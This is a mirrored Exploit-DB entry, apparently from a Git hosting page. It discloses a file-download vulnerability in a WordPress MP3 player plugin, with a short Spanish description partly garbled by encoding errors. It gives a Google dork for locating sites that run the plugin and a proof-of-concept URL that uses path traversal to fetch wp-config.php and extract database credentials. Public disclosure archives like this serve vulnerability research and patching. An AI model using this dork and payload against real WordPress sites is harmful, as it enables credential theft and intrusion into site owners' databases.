bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/35460.txt
Offensive Security d63de06c7a DB: 2022-11-10 
2776 changes to exploits/shellcodes/ghdb
2022-11-10 16:39:50 +00:00

36 lines
No EOL
813 B
Text
Raw Blame History

# Exploit Title: Wordpress CodeArt Google MP3 Player plugin - File
Disclosure Download
# Google Dork:
inurl:/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=
# Date: 02/12/2014
# Exploit Author: QK14 Team
# Vendor Homepage: https://wordpress.org/plugins/google-mp3-audio-player/
# Software Link: https://wordpress.org/plugins/google-mp3-audio-player/
# Version: 1.0.11
# http://wordpressa.quantika14.com/repository/index.php?id=14
Descripci<EFBFBD>n:
Este plugin es vulnerable a File Disclosure Download.
Gracias a esta vulnerabilidad, un usuario podr<64> descargar el archivo de
configuraci<EFBFBD>n config.php y extraer de <20>l los datos de acceso a la Base de
Datos.
POF:
localhost/wordpress/wp-content/plugins/google-mp3-audio-player/direct_downlo
ad.php?file=../../../wp-config.php
Reference in a new issue View git blame Copy permalink